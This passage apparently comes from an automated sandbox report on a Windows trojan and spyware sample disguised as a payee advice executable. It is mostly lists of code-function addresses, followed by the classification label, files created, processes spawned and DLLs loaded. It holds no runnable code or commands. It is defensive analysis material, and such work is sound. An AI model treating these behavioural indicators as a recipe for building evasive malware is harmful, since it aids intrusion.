            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E49084_2_3A7E4908
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E70084_2_3A7E7008
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EC6084_2_3A7EC608
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E29074_2_3A7E2907
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EDE004_2_3A7EDE00
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E16FF4_2_3A7E16FF
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E9AFF4_2_3A7E9AFF
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E6FFB4_2_3A7E6FFB
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E1FF84_2_3A7E1FF8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EB2F84_2_3A7EB2F8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E48F74_2_3A7E48F7
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E0DF04_2_3A7E0DF0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E87F04_2_3A7E87F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EDDF04_2_3A7EDDF0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E3FE84_2_3A7E3FE8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EF5E84_2_3A7EF5E8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E1FE84_2_3A7E1FE8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EB2E84_2_3A7EB2E8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7ECAE04_2_3A7ECAE0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E0DE04_2_3A7E0DE0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E87E04_2_3A7E87E0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E9FD84_2_3A7E9FD8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E3FD84_2_3A7E3FD8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EF5D74_2_3A7EF5D7
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E04D04_2_3A7E04D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E74D04_2_3A7E74D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7ECAD14_2_3A7ECAD1
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E36C84_2_3A7E36C8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EE2C84_2_3A7EE2C8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E9FC84_2_3A7E9FC8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E5FC74_2_3A7E5FC7
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EB7C04_2_3A7EB7C0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E04C04_2_3A7E04C0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E74BF4_2_3A7E74BF
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E56B84_2_3A7E56B8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E8CB84_2_3A7E8CB8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EE2B84_2_3A7EE2B8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E36B74_2_3A7E36B7
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EFAB04_2_3A7EFAB0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EB7AF4_2_3A7EB7AF
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E2DA84_2_3A7E2DA8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7ECFA84_2_3A7ECFA8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E56A84_2_3A7E56A8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E8CA94_2_3A7E8CA9
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7ECFA74_2_3A7ECFA7
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E1BA04_2_3A7E1BA0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EA4A04_2_3A7EA4A0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EFAA04_2_3A7EFAA0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E2D9B4_2_3A7E2D9B
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E4D984_2_3A7E4D98
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E79984_2_3A7E7998
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EE7904_2_3A7EE790
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E1B914_2_3A7E1B91
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EA48F4_2_3A7EA48F
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E24884_2_3A7E2488
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7EBC884_2_3A7EBC88
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E79884_2_3A7E7988
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E4D894_2_3A7E4D89
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E12804_2_3A7E1280
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7E91804_2_3A7E9180
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8070C04_2_3A8070C0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A80D7104_2_3A80D710
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8038804_2_3A803880
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8006804_2_3A800680
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A806A804_2_3A806A80
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8054A04_2_3A8054A0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8022A04_2_3A8022A0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A803EC04_2_3A803EC0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A800CC04_2_3A800CC0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A805AE04_2_3A805AE0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8028E04_2_3A8028E0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A805E004_2_3A805E00
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A802C004_2_3A802C00
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8048204_2_3A804820
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8016204_2_3A801620
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8000384_2_3A800038
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A80EE3B4_2_3A80EE3B
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8064404_2_3A806440
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8032404_2_3A803240
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8000404_2_3A800040
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A80EE484_2_3A80EE48
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A804E604_2_3A804E60
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A801C604_2_3A801C60
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8051804_2_3A805180
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A801F804_2_3A801F80
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A806DA04_2_3A806DA0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A803BA04_2_3A803BA0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8009A04_2_3A8009A0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8057C04_2_3A8057C0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8025C04_2_3A8025C0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A800FD04_2_3A800FD0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8041D04_2_3A8041D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8041E04_2_3A8041E0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A800FE04_2_3A800FE0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8045004_2_3A804500
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8013004_2_3A801300
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8061204_2_3A806120
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A802F204_2_3A802F20
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A804B404_2_3A804B40
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8019404_2_3A801940
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8003504_2_3A800350
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8067604_2_3A806760
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8035604_2_3A803560
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8003604_2_3A800360
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A811CF04_2_3A811CF0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8184704_2_3A818470
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81FB304_2_3A81FB30
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A810E8B4_2_3A810E8B
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81A0904_2_3A81A090
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81D2904_2_3A81D290
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A810E984_2_3A810E98
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81BCB04_2_3A81BCB0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A818AB04_2_3A818AB0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81EEB04_2_3A81EEB0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81D8D04_2_3A81D8D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81A6D04_2_3A81A6D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A811CE04_2_3A811CE0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81F4F04_2_3A81F4F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8190F04_2_3A8190F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81C2F04_2_3A81C2F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8104F94_2_3A8104F9
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8100074_2_3A810007
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81C6104_2_3A81C610
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8194104_2_3A819410
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81F8104_2_3A81F810
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8118174_2_3A811817
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8118284_2_3A811828
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81B0304_2_3A81B030
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81E2304_2_3A81E230
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81CC414_2_3A81CC41
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8100404_2_3A810040
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A819A504_2_3A819A50
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81CC504_2_3A81CC50
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81E8704_2_3A81E870
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81B6704_2_3A81B670
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81B9904_2_3A81B990
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8187904_2_3A818790
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81EB904_2_3A81EB90
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81D5B04_2_3A81D5B0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81A3B04_2_3A81A3B0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8109BF4_2_3A8109BF
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81F1D04_2_3A81F1D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8109D04_2_3A8109D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A818DD04_2_3A818DD0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81BFD04_2_3A81BFD0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8135E84_2_3A8135E8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81DBF04_2_3A81DBF0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81A9F04_2_3A81A9F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8105084_2_3A810508
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81AD104_2_3A81AD10
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81DF104_2_3A81DF10
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81C9304_2_3A81C930
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8197304_2_3A819730
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8113514_2_3A811351
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81E5504_2_3A81E550
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81B3504_2_3A81B350
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8113604_2_3A811360
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8133604_2_3A813360
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A819D704_2_3A819D70
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81CF704_2_3A81CF70
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A991B504_2_3A991B50
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9930084_2_3A993008
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9936F04_2_3A9936F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9914704_2_3A991470
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9929204_2_3A992920
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A990D88
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A992238
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A9947B8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A991B3F
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A9936E1
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A991460
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A990A10
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A9908DE
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A992911
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A990960
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A992FFB
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A990D7B
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A992229
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A990006
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3A990040
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3B001B14
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3B004958
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_3B00B450
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: String function: 00402B3A appears 47 times
            Source: PayeeAdvice_HK54912_R0038704_37504.exe | Static PE information: invalid certificate
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenametipning husnummers.exe< vs PayeeAdvice_HK54912_R0038704_37504.exe
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PayeeAdvice_HK54912_R0038704_37504.exe
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3348987225.0000000037377000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PayeeAdvice_HK54912_R0038704_37504.exe
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenametipning husnummers.exe< vs PayeeAdvice_HK54912_R0038704_37504.exe
            Source: PayeeAdvice_HK54912_R0038704_37504.exe | Binary or memory string: OriginalFilenametipning husnummers.exe< vs PayeeAdvice_HK54912_R0038704_37504.exe
            Source: PayeeAdvice_HK54912_R0038704_37504.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/9@6/4
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 0_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 0_2_0040206A CoCreateInstance
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | File created: C:\Users\user\AppData\Local\foreslaaende
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Mutant created: NULL
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | File created: C:\Users\user\AppData\Local\Temp\nsg229C.tmp
            Source: PayeeAdvice_HK54912_R0038704_37504.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: PayeeAdvice_HK54912_R0038704_37504.exe | ReversingLabs: Detection: 31%
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | File read: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
            Source: unknown | Process created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Process created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Process created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: iertutil.dll
